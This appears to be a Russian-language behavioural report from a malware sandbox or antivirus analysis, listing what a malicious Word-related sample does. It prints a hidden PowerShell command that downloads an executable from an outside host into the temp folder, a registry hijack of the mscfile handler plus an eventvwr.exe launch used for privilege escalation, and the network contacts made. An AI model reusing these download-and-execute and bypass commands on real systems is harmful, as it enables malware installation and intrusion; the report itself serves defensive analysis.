Техническая информация
- http://www.misshal.com/msword/lost2.exe как %temp%\\outlk.exe
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.misshal.com/msword/lost2.exe','%TEMP%\\outlk.exe') & reg add HKCU\\Software\\Classes\\mscf...
- %WINDIR%\syswow64\eventvwr.exe
- nul
- 'mi##hal.com':80
- 'mi##hal.com':443
- http://www.mi##hal.com/msword/lost2.exe
- 'mi##hal.com':443
- DNS ASK mi##hal.com
- '%WINDIR%\syswow64\reg.exe' add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d %TEMP%\\outlk.exe /f
- '%WINDIR%\syswow64\eventvwr.exe'
- '%WINDIR%\syswow64\mmc.exe' "<SYSTEM32>\eventvwr.msc" (со скрытым окном)
- '%WINDIR%\syswow64\ping.exe' -n 15 127.0.0.1
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc"
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.misshal.com/msword/lost2.exe','%TEMP%\\outlk.exe') & reg add HKCU\\Software\\Classes\\mscf... (со скрытым окном)